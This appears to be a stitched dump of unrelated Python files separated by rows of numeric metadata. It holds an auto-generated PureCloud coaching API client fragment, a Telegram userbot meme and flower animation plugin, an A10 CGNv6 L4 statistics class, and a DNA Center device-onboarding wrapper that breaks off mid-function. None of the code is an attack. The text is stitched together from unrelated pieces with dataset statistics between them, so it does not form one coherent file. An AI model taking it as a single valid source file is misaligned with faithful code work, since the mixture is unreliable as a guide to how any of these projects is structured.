>>> thread = api.post_coaching_appointment_annotations(appointment_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param CoachingAnnotationCreateRequest body: The annotation to add (required)
:return: CoachingAnnotation
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_coaching_appointment_annotations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `post_coaching_appointment_annotations`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_coaching_appointment_annotations`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}/annotations'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAnnotation',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_coaching_appointment_conversations(self, appointment_id, body, **kwargs):
"""
Add a conversation to an appointment
Permission not required if you are the creator or facilitator of the appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_coaching_appointment_conversations(appointment_id, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str appointment_id: The ID of the coaching appointment. (required)
:param AddConversationRequest body: body (required)
:return: AddConversationResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['appointment_id', 'body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_coaching_appointment_conversations" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'appointment_id' is set
if ('appointment_id' not in params) or (params['appointment_id'] is None):
raise ValueError("Missing the required parameter `appointment_id` when calling `post_coaching_appointment_conversations`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_coaching_appointment_conversations`")
resource_path = '/api/v2/coaching/appointments/{appointmentId}/conversations'.replace('{format}', 'json')
path_params = {}
if 'appointment_id' in params:
path_params['appointmentId'] = params['appointment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AddConversationResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_coaching_appointments(self, body, **kwargs):
"""
Create a new appointment
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_coaching_appointments(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param CreateCoachingAppointmentRequest body: The appointment to add (required)
:return: CoachingAppointmentResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_coaching_appointments" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_coaching_appointments`")
resource_path = '/api/v2/coaching/appointments'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
def post_coaching_appointments_aggregates_query(self, body, **kwargs):
"""
Retrieve aggregated appointment data
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.post_coaching_appointments_aggregates_query(body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param CoachingAppointmentAggregateRequest body: Aggregate Request (required)
:return: CoachingAppointmentAggregateResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body']
all_params.append('callback')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method post_coaching_appointments_aggregates_query" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `post_coaching_appointments_aggregates_query`")
resource_path = '/api/v2/coaching/appointments/aggregates/query'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['PureCloud OAuth']
response = self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CoachingAppointmentAggregateResponse',
auth_settings=auth_settings,
callback=params.get('callback'))
return response
| 42.520356 | 221 | 0.575701 | 6,588 | 66,842 | 5.656952 | 0.04493 | 0.038371 | 0.019883 | 0.018354 | 0.935226 | 0.924895 | 0.912767 | 0.906756 | 0.902624 | 0.898438 | 0 | 0.001027 | 0.344334 | 66,842 | 1,571 | 222 | 42.547422 | 0.849336 | 0.28708 | 0 | 0.858513 | 0 | 0 | 0.220344 | 0.059557 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022782 | false | 0 | 0.008393 | 0 | 0.053957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6a9bb4feaabc4146ae9cad7a0a273b1039ac5a17 | 2,900 | py | Python | userbot/plugins/meme.py | thecyberbyte-tech/Secktor-Userbot | 5ede9c98e4480ec48ad5dd114a5bf2da3df6dc3f | [
"MIT"
] | 44 | 2021-01-11T13:33:48.000Z | 2022-02-05T17:53:33.000Z | userbot/plugins/meme.py | Kishoth-45/TamilBot | 498a6716f897ba83975c43ce4fc18c875e6aa4ec | [
"MIT"
] | 1 | 2022-02-13T12:46:32.000Z | 2022-02-13T12:46:32.000Z | userbot/plugins/meme.py | Kishoth-45/TamilBot | 498a6716f897ba83975c43ce4fc18c875e6aa4ec | [
"MIT"
] | 59 | 2021-01-08T07:34:55.000Z | 2022-02-06T10:28:38.000Z | """
Memes Plugin for Userbot
usage = .meme someCharacter //default delay will be 3
By : - @Zero_cool7870
"""
from telethon import events
import asyncio
import os
import sys
from uniborg.util import admin_cmd
@borg.on(admin_cmd(pattern=r"meme"))
async def meme(event):
if event.fwd_from:
return
memeVar = event.text
sleepValue = 3
memeVar = memeVar[6:]
await event.edit("-------------"+memeVar)
await asyncio.sleep(sleepValue)
await event.edit("------------"+memeVar+"-")
await asyncio.sleep(sleepValue)
await event.edit("-----------"+memeVar+"--")
await asyncio.sleep(sleepValue)
await event.edit("----------"+memeVar+"---")
await asyncio.sleep(sleepValue)
await event.edit("---------"+memeVar+"----")
await asyncio.sleep(sleepValue)
await event.edit("--------"+memeVar+"-----")
await asyncio.sleep(sleepValue)
await event.edit("-------"+memeVar+"------")
await asyncio.sleep(sleepValue)
await event.edit("------"+memeVar+"-------")
await asyncio.sleep(sleepValue)
await event.edit("-----"+memeVar+"--------")
await asyncio.sleep(sleepValue)
await event.edit("----"+memeVar+"---------")
await asyncio.sleep(sleepValue)
await event.edit("---"+memeVar+"----------")
await asyncio.sleep(sleepValue)
await event.edit("--"+memeVar+"-----------")
await asyncio.sleep(sleepValue)
await event.edit("-"+memeVar+"------------")
await asyncio.sleep(sleepValue)
await event.edit(memeVar+"-------------")
await asyncio.sleep(sleepValue)
await event.edit(memeVar)
await asyncio.sleep(sleepValue)
"""
Bonus : Flower Boquee Generater
usage:- .flower
"""
@borg.on(admin_cmd(pattern=r"flower"))
async def meme(event):
if event.fwd_from:
return
flower =" 🌹"
sleepValue = 5
await event.edit(flower+" ")
await asyncio.sleep(sleepValue)
await event.edit(flower+flower+" ")
await asyncio.sleep(sleepValue)
await event.edit(flower+flower+flower+" ")
await asyncio.sleep(sleepValue)
await event.edit(flower+flower+flower+flower+" ")
await asyncio.sleep(sleepValue)
await event.edit(flower+flower+flower+flower+flower+" ")
await asyncio.sleep(sleepValue)
await event.edit(flower+flower+flower+flower+flower+flower+" ")
await asyncio.sleep(sleepValue)
await event.edit(flower+flower+flower+flower+flower+flower+flower+" ")
await asyncio.sleep(sleepValue)
await event.edit(flower+flower+flower+flower+flower+flower+flower+flower+" ")
await asyncio.sleep(sleepValue)
await event.edit(flower+flower+flower+flower+flower+flower+flower+flower+flower+" ")
await asyncio.sleep(sleepValue)
await event.edit(flower+flower+flower+flower+flower+flower+flower+flower+flower+flower)
await asyncio.sleep(sleepValue)
| 34.52381 | 91 | 0.637586 | 326 | 2,900 | 5.656442 | 0.150307 | 0.292842 | 0.35141 | 0.364425 | 0.848156 | 0.848156 | 0.824295 | 0.824295 | 0.824295 | 0.784165 | 0 | 0.00334 | 0.174138 | 2,900 | 83 | 92 | 34.939759 | 0.76618 | 0.034483 | 0 | 0.455882 | 0 | 0 | 0.08513 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.073529 | 0 | 0.102941 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
0a923bdaa3b779e2958847b2c360c99ae1b51cd0 | 8,059 | py | Python | a10sdk/core/cgnv6/cgnv6_l4.py | deepfield/a10sdk-python | bfaa58099f51f085d5e91652d1d1a3fd5c529d5d | [
"Apache-2.0"
] | 16 | 2015-05-20T07:26:30.000Z | 2021-01-23T11:56:57.000Z | a10sdk/core/cgnv6/cgnv6_l4.py | deepfield/a10sdk-python | bfaa58099f51f085d5e91652d1d1a3fd5c529d5d | [
"Apache-2.0"
] | 6 | 2015-03-24T22:07:11.000Z | 2017-03-28T21:31:18.000Z | a10sdk/core/cgnv6/cgnv6_l4.py | deepfield/a10sdk-python | bfaa58099f51f085d5e91652d1d1a3fd5c529d5d | [
"Apache-2.0"
] | 23 | 2015-03-29T15:43:01.000Z | 2021-06-02T17:12:01.000Z | from a10sdk.common.A10BaseClass import A10BaseClass
class SamplingEnable(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param counters1: {"enum": ["all", "no-fwd-route", "no-rev-route", "out-of-session-memory", "tcp-rst-sent", "ipip-icmp-reply-sent", "icmp-filtered-sent", "icmp-host-unreachable-sent", "icmp-reply-no-session-drop", "ipip-truncated", "ip-src-invalid-unicast", "ip-dst-invalid-unicast", "ipv6-src-invalid-unicast", "ipv6-dst-invalid-unicast", "bad-l3-protocol", "special-ipv4-no-route", "special-ipv6-no-route", "icmp-reply-sent", "icmpv6-reply-sent", "out-of-state-dropped", "ttl-exceeded-sent", "cross-cpu-alg-gre-no-match", "cross-cpu-alg-gre-preprocess-err", "lsn-fast-setup", "lsn-fast-setup-err", "lsn-fast-setup-delayed-err", "lsn-fast-setup-mtu-too-small", "dst-nat-needed-drop", "invalid-nat64-translated-addr", "tcp-rst-loop-drop", "static-nat-alloc", "static-nat-free", "process-l4", "preprocess-error", "process-special", "process-continue", "process-error", "ip-unknown-process", "src-nat-pool-not-found", "dst-nat-pool-not-found", "l3-ip-src-invalid-unicast", "l3-ip-dst-invalid-unicast", "l3-ipv6-src-invalid-unicast", "l3-ipv6-dst-invalid-unicast"], "type": "string", "description": "'all': all; 'no-fwd-route': No Forward Route for Session; 'no-rev-route': No Reverse Route for Session; 'out-of-session-memory': Out of Session Memory; 'tcp-rst-sent': TCP RST Sent; 'ipip-icmp-reply-sent': IPIP ICMP Echo Reply Sent; 'icmp-filtered-sent': ICMP Administratively Filtered Sent; 'icmp-host-unreachable-sent': ICMP Host Unreachable Sent; 'icmp-reply-no-session-drop': ICMP Reply No Session Drop; 'ipip-truncated': IPIP Truncated Packet; 'ip-src-invalid-unicast': IPv4 Source Not Valid Unicast; 'ip-dst-invalid-unicast': IPv4 Destination Not Valid Unicast; 'ipv6-src-invalid-unicast': IPv6 Source Not Valid Unicast; 'ipv6-dst-invalid-unicast': IPv6 Destination Not Valid Unicast; 'bad-l3-protocol': Bad Layer 3 Protocol; 'special-ipv4-no-route': Stateless IPv4 No Forward Route; 'special-ipv6-no-route': Stateless IPv6 No Forward Route; 'icmp-reply-sent': ICMP Echo Reply Sent; 'icmpv6-reply-sent': ICMPv6 Echo Reply Sent; 'out-of-state-dropped': L4 Out of State packets; 'ttl-exceeded-sent': ICMP TTL Exceeded Sent; 'cross-cpu-alg-gre-no-match': ALG GRE Cross CPU No Matching Session; 'cross-cpu-alg-gre-preprocess-err': ALG GRE Cross CPU Preprocess Error; 'lsn-fast-setup': LSN Fast Setup Attempt; 'lsn-fast-setup-err': LSN Fast Setup Error; 'lsn-fast-setup-delayed-err': LSN Fast Setup Delayed Error; 'lsn-fast-setup-mtu-too-small': LSN Fast Setup MTU Too Small; 'dst-nat-needed-drop': Destination NAT Needed Drop; 'invalid-nat64-translated-addr': Invalid NAT64 Translated IPv4 Address; 'tcp-rst-loop-drop': RST Loop Drop; 'static-nat-alloc': Static NAT Alloc; 'static-nat-free': Static NAT Free; 'process-l4': Process L4; 'preprocess-error': Preprocess Error; 'process-special': Process Special; 'process-continue': Process Continue; 'process-error': Process Error; 'ip-unknown-process': Process IP Unknown; 'src-nat-pool-not-found': Src NAT Pool Not Found; 'dst-nat-pool-not-found': Dst NAT Pool Not Found; 'l3-ip-src-invalid-unicast': IPv4 L3 Source Invalid Unicast; 'l3-ip-dst-invalid-unicast': IPv4 L3 Destination Invalid Unicast; 'l3-ipv6-src-invalid-unicast': IPv6 L3 Source Invalid Unicast; 'l3-ipv6-dst-invalid-unicast': IPv6 L3 Destination Invalid Unicast; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "sampling-enable"
self.DeviceProxy = ""
self.counters1 = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class L4(A10BaseClass):
""" :param sampling_enable: {"minItems": 1, "items": {"type": "object"}, "uniqueItems": true, "type": "array", "array": [{"properties": {"optional": true, "counters1": {"enum": ["all", "no-fwd-route", "no-rev-route", "out-of-session-memory", "tcp-rst-sent", "ipip-icmp-reply-sent", "icmp-filtered-sent", "icmp-host-unreachable-sent", "icmp-reply-no-session-drop", "ipip-truncated", "ip-src-invalid-unicast", "ip-dst-invalid-unicast", "ipv6-src-invalid-unicast", "ipv6-dst-invalid-unicast", "bad-l3-protocol", "special-ipv4-no-route", "special-ipv6-no-route", "icmp-reply-sent", "icmpv6-reply-sent", "out-of-state-dropped", "ttl-exceeded-sent", "cross-cpu-alg-gre-no-match", "cross-cpu-alg-gre-preprocess-err", "lsn-fast-setup", "lsn-fast-setup-err", "lsn-fast-setup-delayed-err", "lsn-fast-setup-mtu-too-small", "dst-nat-needed-drop", "invalid-nat64-translated-addr", "tcp-rst-loop-drop", "static-nat-alloc", "static-nat-free", "process-l4", "preprocess-error", "process-special", "process-continue", "process-error", "ip-unknown-process", "src-nat-pool-not-found", "dst-nat-pool-not-found", "l3-ip-src-invalid-unicast", "l3-ip-dst-invalid-unicast", "l3-ipv6-src-invalid-unicast", "l3-ipv6-dst-invalid-unicast"], "type": "string", "description": "'all': all; 'no-fwd-route': No Forward Route for Session; 'no-rev-route': No Reverse Route for Session; 'out-of-session-memory': Out of Session Memory; 'tcp-rst-sent': TCP RST Sent; 'ipip-icmp-reply-sent': IPIP ICMP Echo Reply Sent; 'icmp-filtered-sent': ICMP Administratively Filtered Sent; 'icmp-host-unreachable-sent': ICMP Host Unreachable Sent; 'icmp-reply-no-session-drop': ICMP Reply No Session Drop; 'ipip-truncated': IPIP Truncated Packet; 'ip-src-invalid-unicast': IPv4 Source Not Valid Unicast; 'ip-dst-invalid-unicast': IPv4 Destination Not Valid Unicast; 'ipv6-src-invalid-unicast': IPv6 Source Not Valid Unicast; 'ipv6-dst-invalid-unicast': IPv6 Destination Not Valid Unicast; 'bad-l3-protocol': Bad Layer 3 Protocol; 'special-ipv4-no-route': Stateless IPv4 No Forward Route; 'special-ipv6-no-route': Stateless IPv6 No Forward Route; 'icmp-reply-sent': ICMP Echo Reply Sent; 'icmpv6-reply-sent': ICMPv6 Echo Reply Sent; 'out-of-state-dropped': L4 Out of State packets; 'ttl-exceeded-sent': ICMP TTL Exceeded Sent; 'cross-cpu-alg-gre-no-match': ALG GRE Cross CPU No Matching Session; 'cross-cpu-alg-gre-preprocess-err': ALG GRE Cross CPU Preprocess Error; 'lsn-fast-setup': LSN Fast Setup Attempt; 'lsn-fast-setup-err': LSN Fast Setup Error; 'lsn-fast-setup-delayed-err': LSN Fast Setup Delayed Error; 'lsn-fast-setup-mtu-too-small': LSN Fast Setup MTU Too Small; 'dst-nat-needed-drop': Destination NAT Needed Drop; 'invalid-nat64-translated-addr': Invalid NAT64 Translated IPv4 Address; 'tcp-rst-loop-drop': RST Loop Drop; 'static-nat-alloc': Static NAT Alloc; 'static-nat-free': Static NAT Free; 'process-l4': Process L4; 'preprocess-error': Preprocess Error; 'process-special': Process Special; 'process-continue': Process Continue; 'process-error': Process Error; 'ip-unknown-process': Process IP Unknown; 'src-nat-pool-not-found': Src NAT Pool Not Found; 'dst-nat-pool-not-found': Dst NAT Pool Not Found; 'l3-ip-src-invalid-unicast': IPv4 L3 Source Invalid Unicast; 'l3-ip-dst-invalid-unicast': IPv4 L3 Destination Invalid Unicast; 'l3-ipv6-src-invalid-unicast': IPv6 L3 Source Invalid Unicast; 'l3-ipv6-dst-invalid-unicast': IPv6 L3 Destination Invalid Unicast; ", "format": "enum"}}}]}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
Class Description::
CGNV6 L4 Statistics.
Class l4 supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/cgnv6/l4`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "l4"
self.a10_url="/axapi/v3/cgnv6/l4"
self.DeviceProxy = ""
self.sampling_enable = []
for keys, value in kwargs.items():
setattr(self,keys, value)
| 138.948276 | 3,459 | 0.7187 | 1,202 | 8,059 | 4.804493 | 0.124792 | 0.09697 | 0.04987 | 0.031169 | 0.904242 | 0.904242 | 0.904242 | 0.904242 | 0.892814 | 0.892814 | 0 | 0.018396 | 0.116392 | 8,059 | 57 | 3,460 | 141.385965 | 0.792585 | 0.909542 | 0 | 0.526316 | 0 | 0 | 0.050946 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.052632 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
7c1aa51b77622224e51bd43f1a9027593ff3e6d0 | 98,481 | py | Python | dnacentersdk/api/v1_3_3/device_onboarding_pnp.py | wastorga/dnacentersdk | 1a25aaef2eaa016fe54ebebbd7448919e0effa3f | [
"MIT"
] | null | null | null | dnacentersdk/api/v1_3_3/device_onboarding_pnp.py | wastorga/dnacentersdk | 1a25aaef2eaa016fe54ebebbd7448919e0effa3f | [
"MIT"
] | null | null | null | dnacentersdk/api/v1_3_3/device_onboarding_pnp.py | wastorga/dnacentersdk | 1a25aaef2eaa016fe54ebebbd7448919e0effa3f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""DNA Center Device Onboarding (PnP) API wrapper.
Copyright (c) 2019 Cisco and/or its affiliates.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
from builtins import *
from past.builtins import basestring
from ...restsession import RestSession
from ...utils import (
check_type,
dict_from_items_with_values,
apply_path_params,
dict_of_str,
)
class DeviceOnboardingPnp(object):
"""DNA Center Device Onboarding (PnP) API (version: 1.3.3).
Wraps the DNA Center Device Onboarding (PnP)
API and exposes the API as native Python
methods that return native Python objects.
"""
def __init__(self, session, object_factory, request_validator):
"""Initialize a new DeviceOnboardingPnp
object with the provided RestSession.
Args:
session(RestSession): The RESTful session object to be used for
API calls to the DNA Center service.
Raises:
TypeError: If the parameter types are incorrect.
"""
check_type(session, RestSession)
super(DeviceOnboardingPnp, self).__init__()
self._session = session
self._object_factory = object_factory
self._request_validator = request_validator
def get_sync_result_for_virtual_account(self,
domain,
name,
headers=None,
**request_parameters):
"""Returns the summary of devices synced from the given smart
account & virtual account with PnP.
Args:
domain(basestring): Smart Account Domain.
name(basestring): Virtual Account Name.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(domain, basestring,
may_be_none=False)
check_type(name, basestring,
may_be_none=False)
if headers is not None:
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
'domain': domain,
'name': name,
}
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-'
+ 'device/sacct/${domain}/vacct/${name}/sync-result')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.get(endpoint_full_url, params=params,
headers=_headers)
else:
json_data = self._session.get(endpoint_full_url, params=params)
return self._object_factory('bpm_0a9c988445cb91c8_v1_3_3', json_data)
def un_claim_device(self,
deviceIdList=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Un-Claims one of more devices with specified workflow.
Args:
deviceIdList(list): UnclaimRequest's deviceIdList (list
of string, objects).
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
}
_payload = {
'deviceIdList':
deviceIdList,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_0b836b7b4b6a9fd5_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/unclaim')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.post(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_0b836b7b4b6a9fd5_v1_3_3', json_data)
def update_device(self,
id,
_id=None,
deviceInfo=None,
runSummaryList=None,
systemResetWorkflow=None,
systemWorkflow=None,
tenantId=None,
version=None,
workflow=None,
workflowParameters=None,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Updates device details specified by device id in PnP database.
Args:
_id(string): Device's _id.
deviceInfo(object): Device's deviceInfo.
runSummaryList(list): Device's runSummaryList (list of
objects).
systemResetWorkflow(object): Device's
systemResetWorkflow.
systemWorkflow(object): Device's systemWorkflow.
tenantId(string): Device's tenantId.
version(number): Device's version.
workflow(object): Device's workflow.
workflowParameters(object): Device's workflowParameters.
id(basestring): id path parameter.
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(dict): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, dict)
check_type(id, basestring,
may_be_none=False)
if headers is not None:
if 'Content-Type' in headers:
check_type(headers.get('Content-Type'),
basestring, may_be_none=False)
if 'X-Auth-Token' in headers:
check_type(headers.get('X-Auth-Token'),
basestring, may_be_none=False)
params = {
}
params.update(request_parameters)
params = dict_from_items_with_values(params)
path_params = {
'id': id,
}
_payload = {
'_id':
_id,
'deviceInfo':
deviceInfo,
'runSummaryList':
runSummaryList,
'systemResetWorkflow':
systemResetWorkflow,
'systemWorkflow':
systemWorkflow,
'tenantId':
tenantId,
'version':
version,
'workflow':
workflow,
'workflowParameters':
workflowParameters,
}
_payload.update(payload or {})
_payload = dict_from_items_with_values(_payload)
if active_validation:
self._request_validator('jsd_09b0f9ce4239ae10_v1_3_3')\
.validate(_payload)
with_custom_headers = False
_headers = self._session.headers or {}
if headers:
_headers.update(dict_of_str(headers))
with_custom_headers = True
e_url = ('/dna/intent/api/v1/onboarding/pnp-device/${id}')
endpoint_full_url = apply_path_params(e_url, path_params)
if with_custom_headers:
json_data = self._session.put(endpoint_full_url, params=params,
json=_payload,
headers=_headers)
else:
json_data = self._session.put(endpoint_full_url, params=params,
json=_payload)
return self._object_factory('bpm_09b0f9ce4239ae10_v1_3_3', json_data)
def import_devices_in_bulk(self,
headers=None,
payload=None,
active_validation=True,
**request_parameters):
"""Add devices to PnP in bulk.
Args:
headers(dict): Dictionary of HTTP Headers to send with the Request
.
payload(list): A JSON serializable Python object to send in the
body of the Request.
active_validation(bool): Enable/Disable payload validation.
Defaults to True.
**request_parameters: Additional request parameters (provides
support for parameters that may be added in the future).
Returns:
MyDict: JSON response. Access the object's properties by using
the dot notation or the bracket notation.
Raises:
TypeError: If the parameter types are incorrect.
MalformedRequest: If the request body created is invalid.
ApiError: If the DNA Center cloud returns an error.
"""
check_type(headers, dict)
check_type(payload, list)
if headers is not None:
